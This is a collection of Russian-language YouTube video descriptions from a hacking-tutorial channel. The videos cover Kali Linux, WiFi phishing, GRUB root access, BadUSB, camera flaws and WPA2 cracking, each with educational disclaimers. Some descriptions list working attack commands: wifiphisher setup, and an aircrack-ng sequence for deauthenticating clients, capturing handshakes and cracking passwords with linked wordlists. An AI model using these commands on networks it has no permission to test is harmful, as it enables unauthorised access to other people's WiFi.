t.me/Pulsechanel — канал Telegram, только там дополнительные и эксклюзивные материалы, а также текстовые материалы к видео. (https://tlgg.ru/Pulsechanel — альтернативная ссылка) hacker-basement.ru/ — наш сайт. Можно почитать статьи, скачать программы из видео и различную обучающую литературу.
В этом видео мы поговорим о Kali Linux. Как установить эту операционную систему и оптимально настроить. Разберемся какие можно внести изменения, а какие вносить не стоит, а также настроим базовый уровень анонимности и установим дополнительный софт
● Сегодня в ролике про Информационную Безопасность: анализируем один из способов взлома WiFi сетей. Именно сегодня речь пойдет о wifiphisher, который позволяет злоумышленнику взломать вашу WiFi сеть используя социальную инженерию. Не знаете как взломать WiFi? Знайте, взломы незаконны! Поэтому мы будем не взламывать, а проверять WiFi на защищенность!
● Команды из видео:
apt update
apt install wifiphisher hostapd dnsmasq python-pyric python-jinja2
ifconfig
wifiphisher
— ● В ролике "{Kali Linux} Лёгкий взлом WiFi без брутфорса | Как защититься от взлома? | Путь хакера" — я рассказываю вам о том, как злоумышленник взломает Ваш WiFi, если захочет этого. Мы рассматриваем уязвимости протокола WPA2, и рассматриваем способы защиты от взлома.
● Помните, что автор ролика ни в коем случае не побуждает вас к созданию, использованию и распространению вредоносного ПО! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить вашу бдительность при обеспечении защиты информации. И тем не менее, вы должны понимать, что это шоу.
● Всё рассказанное в ролике — является авторской выдумкой. Всё происходящее в видео — выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Все ссылки ведут на программы-пустышки, созданные с развлекательной целью. Они созданы только для имитации описанного функционала. Любые другие совпадения наименований программного обеспечения, названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике — не более чем нелепое совпадение и полная случайность.
● Курс «Java-разработка» в SkillFactory: clc.to/Qn5C3g
45% скидки на обучение по промокоду UnderMind (до 30.07.2020)
● В этом ролике: я расскажу вам о 7-ми командах, которые ни в коем случае нельзя вводить в Linux, Termux, Andrax или же Kali Nethunter. Это не очень хорошие команды, которые могут позволят злоумышленникам получить полный доступ к вашему ПК или же вовсе удалить вашу систему со всеми данными. Станете ли вы вводить команду «echo» или «ping»? Если да, тогда задумайтесь. А еще лучше — посмотрите этот ролик, и пересмотрите своё отношение к тем командам, которые вам предлагают ввести.
● t.me/linuxplz0x41 — Наш новый канал «Linux, please». Там мы делимся интересными статьями по этой крутой системе. Присоединяйся!
— ● В ролике «7 0ПACHbIX КОМАНД для Linux/Termux/Kali Nethunter/Andrax | UnderMind» — я рассказываю вам о том, какие команды не стоит вводить в Linux, Andrax, Kali Linux или же Termux. Вы наверняка знаете команду rm -rf — которая проводит рекурсивное удаление всех пользовательских данных. Так вот, хацкеры-злоумышленники научились обфусцировать код, делая его нечитаемым, и теперь нежелательно вводить даже такие команды вроде «echo». Иногда используется принцип простого кодирования в base64, иногда используется более сложный принцип — принцип транслитерации, но так или иначе, вы должны быть осторожными при вводе команд в свой терминал. Особенно при вводе команд из незнакомого (или малоавторитетного источника).
● Kali Linux — это обычная Операционная Система (ОС) для специалистов по защите информации. Эта ОС нигде не запрещена и есть в открытом доступе (не в даркнете). Все утилиты, которые в ней есть, предназначены для тестирования своих сетей и систем на защищенность. Автор ролика ни в коем случае не побуждает вас к созданию и использованию любого ПО в противозаконых целях! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить Вашу бдительность при обеспечении защиты информации.
● Данный ролик — художественный вымысел автора, монтаж, фотошоп и постанова. Всё рассказанное в ролике — является авторской выдумкой. Всё происходящее в видео — выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения (ПО), названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике — не более чем совпадение и полная случайность.
● В этом ролике: серьезная уязвимость всех Linux дистрибутивов содержащих GRUB, которая позволит злоумышленнику получить полный root доступ к твоему компьютеру без ввода пароля ровно за 60 секунд.
— ● В ролике «Твой Kali Linux небезОПАСЕН | Ты ВЗЛОМАН за 1 минуту | UnderMind» — я рассказываю вам об Информационной безопасности. Именно сегодня речь пойдет об очень серьезной уязвимости, которая затрагивает все дистрибутивы Linux (Ubuntu Linux, Debian Linux, Kali Linux, Linux Mint, RedHat, openSUSE и т.д.). Это очень серьезная уязвимость, которая позволит получить root доступ без пароля через начальный загрузчик GRUB. Но, к счастью, она требует личного присутствия злоумышленника у вашего компьютера. Я рассказываю об уязвимости Линукс, а так же о том, как защитить систему от взлома. Как видите, Linux не защищен от взлома, и это весьма печально…
● Помните, что автор ролика занимается не взломами и противозаконной деятельностью, а проверкой систем на защищенность для обеспечения информационной безопасности, и ни в коем случае не побуждает вас зрителей каких-либо действий! Данный ролик носит ознакомительный, а так-же образовательный характер в плане информационной безопасности. Видео призвано повысить вашу бдительность при обеспечении защиты информации.
● Всё рассказанное в ролике — является художественным вымыслом автора ролика. Всё происходящее в видео — выполнено используя монтаж и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения и каких-либо фактов в ролике — не более чем нелепое совпадение и полная случайность.
Легко ли узнать пароль от вашего аккаунта в социальных сетях или вашей почты? Да, если вы регистрируетесь на сайтах, чьи базы данных постоянно сливают, и если вы регистрируетесь на сомнительных ресурсах и используете там тот же пароль, что использовали ранее. В этом видео мы проведем эксперимент, в котором создадим собственный фейковый сайт с формой регистрации для ничего подозревающих пользователей. При помощи оставленных данных мы попытаемся узнать о нем много информации и даже в рамках эксперимента получить доступ (взлом) к его аккаунтам на различных ресурсах!
● В этом ролике: Мы проведем очень интересное тестирование антивируса Касперского, проверив его в реальных условиях во время тестирования нашей виртуальной машины на устойчивость к BadUSB. Ну, а что из этого вышло — смотрите в этом ролике!
— ● В ролике «Зло кабель vs. Kaspersky | BadUSB и минус система | UnderMind» — мы проводим тестирование антивируса Касперского к BadUSB, к RubyDucky и ко всему такому. В общем, я рассказываю вам о том, как проводил анализ и тестирование своей системы на устойчивость к BadUSB. Если вы не знаете — BadUSB, это очень интересная штуковина с точки зрения анализа на защищенность. Она позволяет совершенно по другому посмотреть на привычные вещи. Собственно — этому и посвящен этот ролик. Мы сначала загружаем обычные BAT скрипты в нашу виртуальную машину, проверяем их антивирусом Касперского, а потом то же самое делаем с BadUSB кабелем — и результат, он действительно оказался удивительным. Я очень надеюсь что меня посмотрят специалисты из лаборатории Касперского, и в ближайшее время разработают решение, позволяющее защититься от такой вот штуковины. Привлечем внимание к серьезной проблеме вместе!
● Всё, что демонстрируется в ролике — предоставлено исключительно для тестирования своих систем на защищенность. Автор ролика ни в коем случае не побуждает вас к созданию и использованию любого ПО в противозаконых целях! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить Вашу бдительность при обеспечении защиты информации.
● Данный ролик — художественный вымысел автора, монтаж, фотошоп и постанова. Всё рассказанное в ролике — является авторской выдумкой. Всё происходящее в видео — выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения (ПО), названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике — не более чем совпадение и полная случайность.
✓ Наш паблик в Телеграм: durov.cc/under_public
● В этом ролике: я расскажу вам о том, как злоумышленники взламывают камеры используя массовую и критическую уязвимость камер видеонаблюдения. Эта уязвимость позволяет подключиться к вашей камере в обход пароля. Я всегда учу Вас выбирать хорошие пароли, поскольку злоумышленники пользуются брутфорсом и подбирают лёгкие пароли за считанные минуты. Но сегодняшняя уязвимость, которую я обнаружил на своей камере, позволяет злоумышленникам с лёгкостью получить пароль от вашей камеры (причем пароль любой сложности) буквально за пару минут. И это не используя брутфорс. После просмотра этого ролика, вы узнаете как проверить свою камеру и как защитить себя от подобной уязвимости.
● vk.cc/9YGqXU — Текстовая версия статьи по Entropy в Kali Linux
— ● В ролике «Критическая уязвимость камер | Взлом камер без брутфорса | Как защититься от взлома? | UnderMind» — я рассказываю вам о том, как злоумышленники взламывают камеры, и о том, как произвести проверку своей камеры видеонаблюдения на устойчивость к атаке, которой пользуются злоумышленники для получения Вашего пароля.
● Kali Linux — это обычная Операционная Система (ОС) для специалистов по защите информации. Эта ОС нигде не запрещена и есть в открытом доступе (не в даркнете). Все утилиты, которые в ней есть, предназначены для тестирования своих сетей и систем на защищенность. Автор ролика ни в коем случае не побуждает вас к созданию и использованию любого ПО в противозаконых целях! Данный ролик носит образовательный характер с точки зрения информационной безопасности, и призван повысить Вашу бдительность при обеспечении защиты информации.
● Данный ролик — художественный вымысел автора, монтаж, фотошоп и постанова. Всё рассказанное в ролике — является авторской выдумкой. Всё происходящее в видео — выполнено используя монтаж, и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения (ПО), названий ПО и либо каких-либо других продемонстрированных фактов и событий в ролике — не более чем совпадение и полная случайность.
✓ ali.pub/35zes7 — Недорогой смартфон для Kali Linux (Nethunter)
✓ goo.gl/sv7Vuf — Alfa — Лучший WiFi Адаптер (для Kali Linux и Nethunter)
● В этом видео я рассказываю о том, что такое Kali NetHunter (Kali Linux на Android), и о возможностях этого самого крутого инструмента для тестирования систем на безопасность.
— ● В ролике «Kali Linux на Android | Всё о Kali NetHunter | UnderMind» — я рассказываю вам о том, что такое Kali Linux, и о том, что такое Kali NetHunter.
Обо всём по порядку.
Kali Linux — это крутая система, которая ориентирована на специалистов по информационной безопасности. В ней есть более 600 профессиональных утилит, для тестирования систем на уязвимости.
Kali NetHunter — это Kali Linux для Android. Это не полноценная операционная система, но это даже плюс. Потому-что установить Kali Linux (Kali NetHunter) можно в виде программы, и запускать в качестве дополнительной ОС, оставив Android на месте, не удаляя его. О том, как установить Kali Linux (Kali NetHunter) на телефон, а если быть точнее, на Android смартфон, я расскажу в следующий раз.
● Данный ролик постановочный. Идея является художественной выдумкой автора, ролик выполнен с использованием средств монтажа. Kali Linux не является вредоносным ПО — это обычная Операционная Система для пентестинга, доступная в открытом доступе. Однако помните, что автор ролика ни в коем случае не побуждает вас к использованию вредоносного ПО! Данный ролик хоть и художественный, однако носит образовательный характер с точки зрения защиты информации, и призван повысить вашу бдительность при обеспечении защиты информации.
Всё рассказанное в ролике — является выдумкой автора ролика. Всё происходящее в видео — выполнено используя монтаж и к реальной жизни не имеет никакого отношения. Любые совпадения наименований программного обеспечения либо каких-либо фактов в ролике — не более чем нелепое совпадение и полная случайность.
● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.
● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i
● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
● Набор словарей:
— goo.gl/z7mnhf — Даты, использовать первым
— goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
— goo.gl/bVsfo2 — Элитный словарь от InsidePRO
— goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов
— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.
● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…